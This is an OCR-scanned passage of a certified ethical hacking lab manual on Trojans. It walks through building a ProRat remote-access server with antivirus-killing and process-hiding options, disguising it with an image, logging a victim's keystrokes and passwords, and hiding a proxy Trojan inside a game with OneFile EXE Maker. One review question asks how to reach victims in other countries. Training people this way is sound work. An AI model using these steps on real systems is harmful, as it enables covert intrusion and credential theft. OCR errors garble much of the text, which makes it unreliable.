You are on page 1of 105

CEH Lab M an ual

Trojans and Backdoors
M od u le 06

Module 06 - Trojans and Backdoors

Trojans and Backdoors
A Trojan is a program that contains a malicious or harmful code inside apparently harmless programming or data in such a iray that it can get control and cause damage, such as mining thefile allocation table on a hard drive.
I C ON KEY

L ab S c e n a rio
According to Bank Into Security News (http://www.bankinfosecurity.com), Trojans pose serious risks tor any personal and sensitive information stored 011 compromised Android devices, the FBI warns. But experts say any mobile device is potentially at risk because the real problem is malicious applications, which 1 1 1 an open environment are impossible to control. And anywhere malicious apps are around, so is the potential for financial fraud. According to cyber security experts, the banking Trojan known as citadel, an advanced variant o f zeus, is a keylogger that steals online-banking credentials by capturing keystrokes. Hackers then use stolen login IDs and passwords to access online accounts, take them over, and schedule fraudulent transactions. Hackers created tins Trojan that is specifically designed for financial fraud and sold 011 the black market. You are a security administrator o f your company, and your job responsibilities include protecting the network from Trojans and backdoors, Trojan attacks, the theft o f valuable data from the network, and identity theft.

1 ^ ~ ! Valuable information Test t o u t knowledge______ m Web exercise W orkbook review

L ab O b jectiv es
The objective o f tins lab is to help students learn to detect Trojan and b ack d oor attacks. The objective o f the lab include: ■ Creating a server and testing a network for attack ■ Detecting Trojans and backdoors ■ Attacking a network using sample Trojans and documenting all vulnerabilities and flaws detected
& T o o ls d e m o n str a te d in th is lab are a v a ila b le in D:\CEHTools\CEH v8 M odule 0 6 T rojans and B a ck d o o rs

L ab E nvironm ent
To carry out tins, you need:
‫י‬

A computer mnning W indow S erver 2 0 0 8 as Guest-1 in virtual machine
W indow 7 mnning as Guest-2 in virtual machine

‫י‬
‫י‬

A web browser with Internet access

■ Administrative privileges to nin tools

C E H L ab M an u al P age 425

E th ica l H a c k in g an d C o u n tem ieasu res Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

Module 06 - Trojans and Backdoors

Lab Duration
Time: 40 Minutes

Overview of Trojans and Backdoors
A Trojan is a program that contains m a lic io u s or harm till code inside apparently harmless program m ing 01‫ ־‬data 1 1 1 such a way that it can g e t con trol and cause damage, such as mining die file a llo c a tio n table 011 a hard disk. With the help o f a Trojan, an attacker gets access to sto r ed p a ssw o r d s in a computer and would be able to read personal documents, d e le te file s, d isp lay p ictu res, an d /01‫ ־‬show messages 011 the screen.

Lab Tasks
TASK
O verview

1

Pick an organization diat you feel is worthy of your attention. Tins could be an educational institution, a commercial company, 01‫ ־‬perhaps a nonprotit chanty. Recommended labs to assist you widi Trojans and backdoors: ■ ■ ■ Creating a Server Using the ProRat tool Wrapping a Trojan Using One File EXE Maker Proxy Server Trojan

■ HTTP Trojan ■
‫י‬ ‫י‬

Remote Access Trojans Using Atelier Web Remote Commander Detecting Trojans Creating a Server Using the Theet

■ Creating a Server Using the Biodox ■ Creating a Server Using the MoSucker
‫י‬

Hack Windows 7 using Metasploit

Lab Analysis
Analyze and document the results related to the lab exercise. Give your opinion 011 your target’s security posture and exposure dirough public and tree information.

P L E A S E TALK T O Y O U R I N S T R U C T O R IF YOU H A V E Q U E S T I O N S R E L A T E D T O T H I S LAB.

C E H L ab M an u al P age 426

E th ica l H a c k in g an d C o u n tem ieasu res Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

M odule 0 6 - T rojans and Backdoors

Lab

Creating a Server Using the ProRat Tool
A Trojan is a program that contains malicious or harmful code inside apparent/)‫׳‬ harmless programming or data in such a way that it can get control and cause damage, such as mining thefile allocation table on a hard drive.
ICON KEY

Lab Scenario
As more and more people regularly use die Internet, cyber security is becoming more im portant for everyone, and yet many people are not aware o f it. Hacker are using malware to hack personal information, financial data, and business information by infecting systems with viruses, worms, and Trojan horses. But Internet security is not only about protecting your machine from malware; hackers can also sniff your data, which means that the hackers can listen to your communication with another machine. O ther attacks include spoofing, mapping, and hijacking. Some hackers may take control o f your and many other machines to conduct a denial-of-service attack, which makes target computers unavailable for normal business. Against high-profile web servers such as banks and credit card gateways. You are a security administrator o f your company, and your job responsibilities include protecting the network from Trojans and backdoors, Trojan attacks, theft o f valuable data from the network, and identity theft.

1 ^ 7 Valuable information Test your knowledge
=

Web exercise W orkbook review

m

Lab Objectives
& T o o ls d e m o n str a te d in th is lab are a v a ila b le in D:\CEHTools\CEH v8 M odule 0 6 T rojans and B a ck d o o rs

The objective o f tins lab is to help suidents learn to detect Trojan and backdoor attacks. The objectives o f the lab include: ■ ■ Creating a server and testing the network for attack Detecting Trojans and backdoors

C E H L ab M an u al P age 427

E th ica l H a c k in g an d C ounterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

M odule 0 6 - T rojans and Backdoors

‫י‬

Attacking a network using sample Trojans ancl documenting all vulnerabilities and flaws detected

Lab Environment
To earn‫ ״‬tins out, you need: ■ ■ ■ ■
‫י‬ ‫י‬

The Prorat tool located at D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\Rem ote A ccess Trojans (RAT)\ProRat A computer running Windows Server 2012 as Host Machine A computer running Window 8 (Virtual Machine) Windows Server 2008 running 1 1 1Virtual Machine A web browser with Internet access Administrative privileges to run tools

Lab Duration
Tune: 20 Minutes

Overview of Trojans and Backdoors
A Trojan is a program that contains m alicious or harmful code inside apparently harmless programming or data in such a way that it can g et control and cause damage, such as ruining die file allocation table on a hard drive. Note: The versions of the created Client or Host and appearance of the website may differ from what is 1 1 1 die lab, but the acmal process of creating the server and die client is the same as shown 1 1 1 diis lab.

Lab Tasks
Create Server with ProRat Launch Windows 8 Virtual Machine and navigate to Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\Rem ote A ccess Trojans (RAT)\ProRat.
2. Double-click ProR at.exe 1 1 1 Windows 8 Virtual Machine.

3. Click C reate Pro Rat Server to start preparing to create a server.

C E H L ab M an u al P age 428

E th ica l H a c k in g an d C o u n term easu res Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

M od ule 0 6 - T rojans and Backdoors

P f l D H R C H . n E T F«OFE55IC]f‫־‬ >HL IflTEHnET ! ! !
Connect
English

PC Info Message Funny Stuff !Explorer Control Panel Shut Down PC Clipboard Give Damage R. Downloder Printer Online Editor

Applications Windows Admin-FTP File Manager Search Files Registry KeyLogger Passwords

ProConnective

Create ‫ ► י‬Create Downloader Server (2 Kbayt) Create CGI V ictim List (16 Kbayt)

^Help
F IG U R E 1.1: P ro R at m ain w indow

4 . The C reate Server window appears.
Create Server
Notifications 1y=J P assw o rd bu tto n : R etrieve passw ords from m any services, su ch as p o p 3 acco u n ts, m essenger, IE , mail, etc. ProConnective Notification (Network and Router) S u p p o rts R e ve rse C o n n e c tio n ‫ט‬ General Settings Use ProConnective Notification »ou. no*1 p.com Test

IP (DNS) Address:

Bind with File

Mail Notification D oesn't support R everse Connection Q Use Mail Notification E-MAIL: bomberman@y ahoo. com Test

Server Extensions ICQ Pager Notification D oesn't suppoit R everse Connection Server Icon Q Use ICQ Pager Notification
ic q u in :

[r]

Test

W) Help

CGI Notification D oesn't support R everse Connection Q Use CGI Notification CGI URL: http: //w w w.yoursite. com/cgi-bin/prorat. cgi Create Server Test

r

Server Size:

342 Kbayt

F IG U R E 1.2: P ro R at Create Server W indow

5. Click General S ettings to change features, such as Server Port. Server Passw ord, Victim Name, and the Port Number you wish to connect over the connection you have to the victim or live the settings default. 6. Uncheck the highlighted options as shown 1 1 1 the following screenshot.

C E H L a b M a n u a l P a g e 429

E th ica l H a c k in g an d C ounterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

M od ule 0 6 - T rojans and Backdoors

Server Port: Server Password: General Settings Victim Name: Q Q Bind with File Q Q Server Extensions 3ive a fake error message. ••1elt server on install. C ill AV-FW on start. disable Windows XP SP2 Security Center

I......Q Disable Windows XP Firewall. Q Hear Windows XP Restore Points. )on't send LAN notifications from ( i 92.i 68.”.“j or (10.*.x.xj

Server Icon

Q

I I Protection for removing Local Server Invisibility Q Hide Processes from All Task Managers (9x/2k/XP) Q Hide Values From All kind of Registry Editors (9x/2k/XP) Q Hide Names From Msconfig (9x/2k/KP) Q UnT erminate Process (2k/XP) Server Size: 342 Kbayt Create Server

I t y ! N o te : y o u can use D ynam ic D N S to co n n ect o v er th e In te rn e t b y using n o -ip acco u n t registration.

r
7. 8.

F IG U R E 1.3: P ro R a t C reate S erver-G eneral Settings

Click Bind w ith File to bind the server with a file; 1 1 1 tins labwe are using the .jpg file to bind the server. Check Bind s e r v e r w ith a file . Click S e l e c t F ile, and navigate to Z:\CEHv8 M odule 0 6 T rojan s an d B a c k d o o r s\T r o ja n s T y p e s\R e m o te A c c e s s T rojan s (R A T )\P roR at\lm ages. Select the Girl.jpg file to bind with the server.

9.

C lipboard: T o read d ata from ran d o m access m em ory. Bind with File

m

This File will be Binded:

Server Extensions

Server Icon

Server Size:

342 Kbayt

Create Server

I ---------------------F IG U R E 1.4: P ro R at Binding w ith a file

C E H L a b M a n u a l P a g e 430

E th ica l H a c k in g an d C ounterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

M od ule 0 6 - T rojans and Backdoors

10. Select Girl.jpg 111 the window and then click Open to bind the file.

Look in:

Images

‫ו‬11°‫ת ז‬
£Q1 VNC Trojan starts a VNC server daemon in the infected system.

File name: Files of type:

Girl

Open Cancel

FIGURE 1.5: ProRat binding an image

11. Click OK after selecting the image for binding with a server.

£ 9 File manager: To manage victim directory for add, delete, and modify.

12. 111 Server E xtensions settings, select EXE (lias icon support) 111 S e lec t Server Extension options.

C E H L ab M an u al P age 431

E th ica l H a c k in g an d C o u n term easu res Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

M od ule 0 6 - T rojans and Backdoors

Notifications

Select Server Extension

^
General Settings Q Q Bind with File

EXE (Has icon support)
PIF (Has no icon support) BAT (Has no icon support) Q

Q SCR (Has icon support)
COM (Has no icon support)

Server Extensions

Server Icon

£ Q Give Damage: To format the entire system files.
Server Size:

497 Kbayt

Create Server

r
FIGURE 1.7: ProRat Server Extensions Settings

13. 111 Server Icon select any o f the icons, and click the Create Server button at bottom right side o f the ProRat window.

Notifications

General Settings

M
Bind with File

Server Extensions

m It connects to the victim using any VNC viewer with the password “secret.”

Server Icon

H U 11
jJ
Server Icon: Choose new Icon Create Server

V) Help

Server Size:

497 Kbayt

I
FIGURE 1.8: ProRat creating a server

14. Click OK atter the server has been prepared, as shown 111 the tollowing screenshot.

C E H L ab M an u al P age 432

E th ica l H a c k in g an d C o u n ten n e asu res Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

M od ule 0 6 - T rojans and Backdoors

FIGURE 1.9: PioRat Server has created 111 die same current directory

15. N ow you can send die server file by mail or any communication media to the victim ’s machine as, for example, a celebration file to run.
£ G SHTTPD is a small HTTP server that can be embedded inside any program. It can be wrapped with a genuine program (game cl1ess.exe). When executed, it turns a computer into an invisible web server.
Applicator Tools
Vicvr M anage Large icons | | j Small icons |j‫״‬ Details

A& ‫־‬t N" ₪‫־‬
□ □ Item check boxes F ilenam e extensions

E

m Preriew pane
fj‫־‬fi Details pa ne

S t Extra large icons f t | M5d u n icons

S
o ©
A K Favorites ■ D esktop

Lirt

I I Hidden items

1 ‫נ ״י‬

______________ Layout_________ ^ « Trcjans Types ► Femote Access Trojans (RAT)
*. J . D ow n lea d Irra c e s J . L an g u a g e |^ b n d e d .s e r v e r |

Show/hide

£ D ow nload} 1 S3J R ecen t places

^ 1Fnglish

1‫־‬ ^ f Libraries
F*| D o c u m tn te J * M usic f c l P ic tu ‫«׳‬c Q j Videos

£

ProRat

j__ R eadm e ^ T ‫ ״‬rk 6 h |__ V ersion.R enew als

H o m e g ro jp

C o m p u te i s L , Local Disk O 5 ? CEH -Tools ( \ \ 1 a

^(1 N etw o rk 9 ite m s

v

1 ite m se lec te d 2 0 8 MB

FIGURE 1.10: ProRat Create Server

16. N ow go to Windows Server 2008 and navigate to Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\Rem ote A c c e s s Trojans (RAT)\ProRat. 17. Double-click binder_server.exe as shown 111 the following screenshot.

C E H L ab M an u al P age 433

E th ica l H a c k in g an d C o u n term easu res Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Module 06 - Trojans and Backdoors

.
El•

p
id t

|
^ •w

‫ י‬T‫׳‬0J%n(Trt>« » Rencte Acr«s "roiflrs RAT( ‫ * י‬PraRat
Tjolc t#lp

ital
Oroanize ▼ • I •I Site H ‫״‬ ^ 0 ° *°

View
Tavoi ite -»‫־‬ ks

M t

T "T ™----------------- Pate modified—

|-| Typ |- >

1

i | r>ornn#ntc
£ ^ ?1cajres Music More Folders I I I I I I I I I I I I I S J i Botnet 'r o ja r s ^ Com nand Shell ~r0)s D efacenent ‫ ־‬ro;ars J 4 D e s tn ja v e T'ojans Ebandng Trojans J 4 E-Mal T 0 ‫׳‬j3ns JA FTP Trojar GUITrojors HTTP H I P S "rp jars ICMP Backdoor J 4 MACOSXTrojons J i Proxy Server Trojan: . Remote Access “rcj?- * J . Apocalypse X Atelie‫ ׳‬Web Remji » v j j [ : R eadne

[^‫־‬u H o c t

j , Ya5»cn_R.c‫«־‬n o5

I I I £

4 . D*fkCo‫׳‬r«tRAT j.. ProRat . VNC’ rojans M arl C S. H ‘ . New Text Docuneil • No... I

-O g *

FIGURE 1.11: ProRat Windows Server 2008

ICMP Trojan: Covert channels are methods in which an attacker can hide data in a protocol diat is undetectable.

18. Now switch to Windows 8 Virtual Machine and enter the IP address o f Windows Server 2008 and the live port number as the default 111 the ProRat main window and click Connect. 19. 111 tins lab, the IP address o f Windows Server 2008 is (10.0.0.13)
Note: IP addresses might be differ 111 classroom labs
F T ProRat V1.9

m um
PC Info Message Chat Funny Stuff !Explorer Control Panel Clipboard Give Damage R. Downloder Printer Create

-

Poit

Applications Windows Admin-FTP File Manager Search Files Registry KeyLogger Passwords Services

Shut Down PC Screen Shot

Online Editor ProConnective

FIGURE 112: ProRat Connecting Infected Server

20. Enter the password you provided at the time ol creating the server and click OK.

C E H L ab M an u al P age 434

E th ica l H a c k in g an d C o u n term easu res Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

Module 06 - Trojans and Backdoors

Password:

OK

Cancel

FIGURE 1.13: ProRat connection window

21. N ow you are con n ected to the victim machine. To test the connection, click PC Info and choose the system information as 111 the following figure.
BfP > > — P ro R a tV 1. 9 IC o n n e c te d [10.0.0.13^^^H B B B ^^^^^r‫ ׳‬- x1 P P D H P C H . n E T P P O F E 5 5 I C 1 n F I L i n T E R r i E T !!!
m Covert channels rely on techniques called tunneling, which allow one protocol to be carried over another protocol. Poit: g m
English

r

Disconnect

IB
Applications Windows Admin-FTP File Manager Search Files Registry Screen Shot KeyLogger Passwords Run Services F'roConnective

//////// PC Information //////// Computer Name User Name Windows Uer Windows Language Windows Path System Path Temp Path Productld Workgroup Data
l-L

10

PC Info Message Chat Funny Stuff !Explorer Control Panel Shut Down PC Clipboard Give Damage R. Downloder Printer Online Editor

WIN-EGBHISG14L0 Administrator English (United St C :\Windows C :\Windows\systemc C:\Users\ADMINI~1\ NO 9/23/2012

System Information Last visited 25 web sites

Mail Address in Registry W ; Help

Create Pc information Received.

FIGURE 1.14: ProRat connected computer w idow

22. N ow click KeyLogger to ste a l user passwords for the online system.
m TASK 2 [ r ? ~ ^ r o R a ^ 7 ^ o n n e c t e d n 0 l0l0 ^ 3 r ~ P H □ H R C H .‫ ח‬E T P P G re S S ID n P L
Disconnect

in T E P riE T

!!!

Attack System Using Keylogger

ip: Q j Q 2

P0 1 1 :g n i R :
Applications Windows Admin-FTP File Manager Search Files Registry Screen Shot KeyLogger Passwords Run Services ProConnective

I I 1 11 h

//////// PC Information ////////
PC Info Message Chat Funny Stuff !Explorer Control Panel Shut Down PC Clipboard Give Damage R. Downloder Printer Online Editor Create Pc information Received.

Computer Name User Name Windows Uer Windows Language Windows Path System Path Temp Path Productld Workgroup Data

WIN-EGBHISG14L0 Administrator English (United St C :\Windows C :\Windows\systerna C:\Users\ADHINI~1\ NO 9/23/2012

Li.
System Information Last visited 25 web sites Mail Address in Registry W ; Help

FIGURE 1.15: ProRat KeyLogger button

C E H L ab M an u al P age 435

E th ica l H a c k in g an d C o u n term easu res Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.

M od ule 0 6 - T rojans and Backdoors

23. The Key Logger window will appear.

m Tliis Trojan works like a remote desktop access. The hacker gains complete GUI access of the remote system: ■ Infect victim’s computer with server.exe and plant Reverse Connecting Trojan. ■ The Trojan connects to victim’s Port to the attacker and establishing a reverse connection. ■ Attacker then has complete control over victim’s machine. FIGURE 1.16: ProRat KeyLogger window

24. N ow switch to Windows Server 2008 machine and open a browser or N otepad and type any text.
i T e x t D o c u m e n t - N o te p a d

File

Edit

Format

View

Help

Hi t h e r e T h i s i s my u s e r n a m e : x y z @ y a h o o .c o m p a s s w o r d : test< 3@ #S !@ l|

‫פר‬

m Banking Trojans are program that steals data from infected computers via web browsers and protected storage.

Ik .
FIGURE 1.17: Test typed in Windows Server 2008 Notepad

A

25. While the victim is writing a m e ssa g e or entering a user nam e and password, you can capmre the log entity. 26. N ow switch to Windows 8 Virtual Machine and click Read Log from time to time to check for data updates trom the victim machine.

C E H L ab M an u al P age 436

E th ica l H a c k in g an d C o u n ten n e asu res Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

M od ule 0 6 - T rojans and Backdoors

E
=9/23/201211:55:28 PMahi bob this is my usemame;xyzatyahoo.com password; testshiftl buttowithl shiftbuttonwith2

|

Read Log

|

Delete Log

Save as

Clear Screen

Help

L • ^L1‫—י‬ ■ UL 1 !_ •‫ רו‬1 1• _ ‫י‬t 1 |KeyLog Received.

---------------------------------------------C□ 1
|

FIGURE 1.18: ProRat KeyLogger window

27.

N ow you can use a lot o f feauires from ProRat on the victim’s machine.

Note: ProRat Keylogger will not read special characters.

Lab Analysis
Analyze and document die results related to die lab exercise. Give your opinion on your target’s secunty posture and exposure dirough public and free information.

P L E A SE TALK TO YOUR I N S T R U C T O R IF YOU HAVE Q U E S T I O N S R E L A T E D T O T H I S LAB.

Questions
1. Create a server wkh advanced options such as Kill AV-FW on start, disable Windows XP Firewall, etc., send it and connect it to the victim machine, and verify whedier you can communicate with the victim machine.

2. Evaluate and examine various mediods to connect to victims if diey are 111 odier cities or countries.

C E H L ab M an u al P age 437

E th ica l H a c k in g an d C ounterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

M odule 0 6 - T rojans and Backdoors

T o o l/U tility

In fo rm atio n C o llected /O b jectiv es A chieved Successful creation o f Blinded server.exe O u tp u t: PC Information Computer NameAYIN-EGBHISG 14LO User Name: Administrator W indows Yer:

P ro R at T o o l

Windows Language: English (United States) W indows Path: c:\windows System Path: c:\windows\system 32 Tem p Path: c :\U se rs\A D M IN I~ l\ Product ID: Workgroup: N O Data: 9/23/2012

In tern e t C o n n ectio n R eq u ired □ Yes P latform S up p o rted 0 C lassroom 0 !Labs 0 No

C E H L ab M an u al P age 438

E th ica l H a c k in g an d C ounterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

M odule 0 6 - T rojans and Backdoors

Lab

Wrapping a Trojan Using One File EXE Maker
A Trojan is aprogram that contains malicious or harmful code inside apparently harmlessprogramming or data in such a way that it canget control and cause damage, such as mining thefile allocation table on a hard drive.
I CON KE Y

Lab Scenario
Sometimes an attacker makes a very secure backdoor even more safer than the normal way to get into a system. A normal user may use only one password for using the system, but a backdoor may need many authentications or SSH layers to let attackers use the system. Usually it is harder to get into the victim system from installed backdoors compared with normal logging 111. After getting control of the victim system by an attacker, the attacker installs a backdoor on the victim system to keep 111s or her access in the future. It is as easy as running a command on the victim machine. Another way the attacker can install a backdoor is using ActiveX. Wlienever a user visits a website, embedded ActiveX could run on the system. Most o f websites show a message about running ActiveX for voice chat, downloading applications, or verifying the user. 111 order to protect your system from attacks by Trojans and need extensive knowledge on creating Trojans and backdoors and protecting the system from attackers. You are a security administrator o f your company, and your job responsibilities include protecting the network from Trojans and backdoors, Trojan attacks, theft o f valuable data from the network, and identity theft.

£17 Valuable information Test your knowledge Web exercise ‫ט‬ Workbook review

& Tools Lab Objectives demonstrated in The objective of tins lab is to help smdents learn to detect Trojan and backdoor this lab are attacks. available in D:\CEHThe objectives o f the lab mclude: Tools\CEHv8 ■ Wrapping a Trojan with a game 111 Windows Server 2008 Module 06 Trojans and Backdoors

Running the Trojan to access the game on the front end

C E H L ab M an u al P age 439

E th ica l H a c k in g an d C o u n tem ieasu res Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

M od ule 0 6 - T rojans and Backdoors

■ Analyzing the Trojan running in backend

Lab Environment
To carry out diis, you need:
‫י‬ OneFileEXEMaker tool located at D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Wrapper Covert Programs\OneFileExeMaker


A computer running Window Server 2012 (host)
Windows Server 2008 running in virtual machine

■ It you decide to download the la te st version, then screenshots shown 111 the lab might differ ■ Administrative privileges to run tools

Lab Duration
Tune: 20 Minutes

Overview of Trojans and Backdoors
A Trojan is a program diat contains m alicious or harmful code inside apparendy harmless programming or data 111 such a way that it can get control and cause damage, such as ruining die hie allocation table on a hard drive.
Note: The versions of die created client or host and appearance may ditfer from what is 111 die lab, but die actual process o f connecting to die server and accessing die processes is same as shown 111 dus lab.
H TASK 1

Lab Tasks
1. Install OneFileEXEMaker on Windows Server 2008 Virtual Machine.
Senna Spy One EXE M a k e r 2 0 0 0 2.0a

OneFile EXE Maker

Senna Spy One EXE Maker 2000 - 2.0a
O fficial W ebsite:
e-mail: senna_spy 0 holm a 1l.com

http://sennaspy.tsx.org
ICQ UIN 3973927

Join many files and make a unique EXE file. This piogram allow join all kind of files: exe, dll. ocx. txt, jpg. bmp Automatic OCX file register and Pack files support W indows 9x. NT and 2000 compatible ! Short File Name Parameters 10 pen M ode | Copy T o | Action

Command Line Parameters.

m

Copyright (C). 1998-2000. By Senna Spy

Open Mode C Normal C Maximized C Minimized C Hide

Copy To-----(“ Windows C System C Temp C Root

Action-----C Open/Execute C Copy Only

r

Pack Fies?

FIGURE 3.1: OneFile EXE Maker Home screen

C E H L ab M an u al P age 440

E th ica l H a c k in g an d C o u n term easu res Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

M od ule 0 6 - T rojans and Backdoors

Click die Add File button and browse to the CEH-Tools folder at die location Z:\CEHv8 Module 06 Trojans and Backdoors\Games\Tetris and add die Lazaris.exe hie.
Senna Spy One EXE M a k e r 2 0 0 0 - 2.0a

Senna Spy One EXE Maker 2000 - 2.0a
O fficial W ebsite: http://sennaspy tsx org
ICQ UIN 3973927

less! You can set various tool options as Open mode, Copy to, Action

e-mail:

senna_spy@hotma 1l.com

Join many files and make a unique EXE file. This program allow join all kind of files: exe. d ll, ocx. txt, jpg, bmp . Automatic OCX file register and Pack files support W indows 9x. NT and 2000 compatible ! [sh o rt File Name LAZARIS.EXE |Parameters |0 p e n Mode |Copy To Hide System | Action | O pen/Execute Getete Save Ejj* Command Line Parameters Open Mode C Normal r Maximized C Minimized (5‫ ־‬Hide Copy T0 ----C Windows (* System C Temp C Root ! Add Fie 1

(• Open/Execute C Copy On|y

Copyright (C). 1998-2000. By Senna Spy

FIGURE 3.2: Adding Lazaris game

3.

Click Add File and browse to the CEH-Tools folder at die location Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\Proxy Server Trojans and add die m cafee.exe file.
Senna Spy O ne E X E Maker 2000 - 2.0a
O fficial W ebsite:
e-mail: senna_spy@hotmail.com

http://sennaspy.tsx.org
ICQ UIN 3973927

& Tools demonstrated in this lab are available in D:\CEHTools\CEHv8 Module 06 Trojans and Backdoors

Join many files and make a unique EXE file. This program allow join all kind of files: exe. dll. ocx. txt, jpg. bmp Automatic OCX file register and Pack files support W indows 9x. NT and 2000 compatible I Short File Name Parameters | Open Mode | Copy To System I System |A ction O pen/Execute | O pen/Execute Add Fie

delete
Save

Command Line Parameters

Copyright |C|, 1998-2000. By Senna Spy

Open Mode C Normal C Maximized C Minimized (* Hide

Copy To!----C Windows (* System ‫ ׳‬Temp C Root

Action-----(• Operv‫׳‬Execute C Copy Only

r

PackFies?

FIGURE 3.3: Adding MCAFEE.EXE proxy server

4.

Select Mcafee and type 8 0 8 0 111 die Command Line Parameters field.

C E H L ab M an u al P age 441

E th ica l H a c k in g an d C o u n term easu res Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

M od ule 0 6 - T rojans and Backdoors

Senna Spy One EXE M a k e r 2 0 0 0

2.0a

Senna Spy O ne EXE Maker 2000 2.0 ‫־‬a
O fficial W ebsite
e-mail: senna_spy@hotmail.com

http ://sennaspy tsx org
ICQ UIN: 3973927

Join many files and make a unique EXE file. This piogram allow !oin all kind of files: exe. dll. ocx. txt. jpg. bmp Automatic OCX file !egistei and Pack files support W indows 9x. NT and 2000 compatible ! Short File Name LAZARIS.EXE Paiameters Open Mode Copy To System Action O pen/Execute O pen/Execute

Save

Command Line Parameters

Copyright (C). 1998-2000. By Senna Spy

Open Mode— C Normal C Maximized C Minimized ^ Hide

Copy To-----C Windows (* System Temp C Root

Open/Execute C Copy On|y

‫“י‬

P *kF le s?

FIGURE 3.4: Assigning port 8080 to MCAFEE

5.

Select Lazaris and check die Normal option in Open Mode.
Senna Spy One EX£ M a k e r 2 0 0 0 2.0a

Senna Spy One EXE Maker 2000 2.0 ‫־‬a
O fficial W ebsite:
e-mail: senna_spy@hotmail.com

http ://sennaspy tsx org
ICQ UIN 39/3 92 7

Join many files and make a unique EXE file. This piogram allow join all kind of files: exe. dll. ocx. txt. jpg. bmp ... Automatic OCX file register and Pack files support W indows 9x. NT and 2000 compatible ! Add Fie LAZARIS.EXE MCAFEE EXE 8080 Notmal Hide (System System I O pen/E xecute I O pen/Execute Delete

Save
Exit Command Line Parameters Open Mode
Jaximized 1 . Maximize C Minimized C Hide

‫־׳‬ : p .0 1 ™ ‫״‬

^ © 2 Copyright (C). 1998 2000. By Senna Spy

Copy To-----C Windows <• System C Temp C Root

Action (• Operv‫׳‬Execute C Copy On|y

r

Pack Fies?

FIGURE 3.5: Setting Lazaris open mode

6.

Click Save and browse to save die tile on the desktop, and name die tile Tetris.exe.

C E H L ab M an u al P age 442

E th ica l H a c k in g an d C o u n ten n e asu res Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

M od ule 0 6 - T rojans and Backdoors

Save n | K 1 e-mail: sennas Name *■

‫י‬-» *‫ ז‬0‫ש‬ I - I Size 1*1 Type

2[

0‫ נ® ־‬a

₪ ‫־‬ 1

1*1 Date modified

^Pubk
: ■ Computer 4 * Network ® M o zia F re fb x £ Google Chrome 1 KB Shortcut 2 KB Shortcut 9/18/2012 2:31 Af 9/18/2012 2:30 A T

_l
Short File Name MCAFEE.EXE (Executables (*.exe) _^J Cancel

± 1
|

|------Save------1

Save L

‫־‬
Copyright (C), 1998-2000. By Senna Spy

Open Mode (• Normal C Maximized C Minimized C Hide

Copy To C Windows (* System (" Temp C Root

(• Open/Execute C Copy 0n|y

r

Pack Fies?

FIGURE 3.6: Trojan created m MCAFEE.EXE will run in background

7. Now double-click to open die Tetris.exe file. Tliis will launch die Lazaris
, , g am€> 011 th e tr011t e ‫ ״‬d •

r
FIGURE 3.7: La2aris game

8.

Now open Task Manager and click die P rocesses tab to check it McAfee is running.

C E H L ab M an u al P age 443

E th ica l H a c k in g an d C ounterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

M od ule 0 6 - T rojans and Backdoors

£ J W indows Task M anager
File O ptions View Help

^ ‫[ *[ ס‬
|

Applications

Processes

jServices | P erform ance j Networking | Users
cpu]

Im a g e ... csrss.exe csrss.exe dw m .exe e xplo re r.e xe LAZARIS.EXE ... Isass.exe Ism.exe 1 MCAFEE.EXE ... m sdtc.exe S creenpresso... . se rvices.exe SLsvc.exe smss.exe spoolsv.exe svch ost.exe svch ost.exe I*

1 User Name 1 [ SYSTEM SYSTEM A dm lnist... Adm m ist... A dm lnist... SYSTEM SYSTEM A d m n s t... NETW O... A dm irilst... SYSTEM NETW O... SYSTEM SYSTEM SYSTEM LOCAL ...

Memory (... | Description 1 .4 6 4K 1.7 3 6K 1,200 K 14,804 K 1.5 4 0K 3,100 K 1 .3 8 4K 580 K 2 .8 3 2 K 2 8 .3 8 0 K 1 .9 9 2K 6 .7 4 8 K 304 K 3 .5 8 8 K 13,508 K 3.648 K Client S e r... Client S er... D e s k to p ... W indows ... LAZARIS

| 1

00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Local S ecu ... Local Sess... MCAFEE MS DTC co... S creenpre... Services a ... M ic ro s o ft... W indows ... Spooler S ... H o s tP ro c ... H o s tP ro c ... gnc| process ■

Show processes from all users

|jP ro:esses: 40

CPU Usage: 2°.‫׳‬c

Physical Memory: 43°.‫׳‬c

FIGURE 3.8: MCAFEE in Task manager

Lab Analysis
Analyze and document the results related to die lab exercise. Give your opinion 011 your target’s secunty posture and exposure dirough public and free information.

P L E AS E TALK TO YOUR I N S T R U C T O R IF YOU HAVE Q U E S T I O N S R E L A T E D T O T H I S LAB.

T o o l/U tility E X E M aker

In fo rm atio n C o llected /O b jectiv es A chieved O u tp u t: Using a backdoor execute T etris.exe

Questions
1. Use various odier options for die Open mode, Copy to, Action sections of OneFileEXEMaker and analyze the results. 2. How you will secure your computer from OneFileEXEMaker attacks?

C E H L ab M an u al P age 444

E th ica l H a c k in g an d C ounterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

M odule 0 6 - T rojans and Backdoors

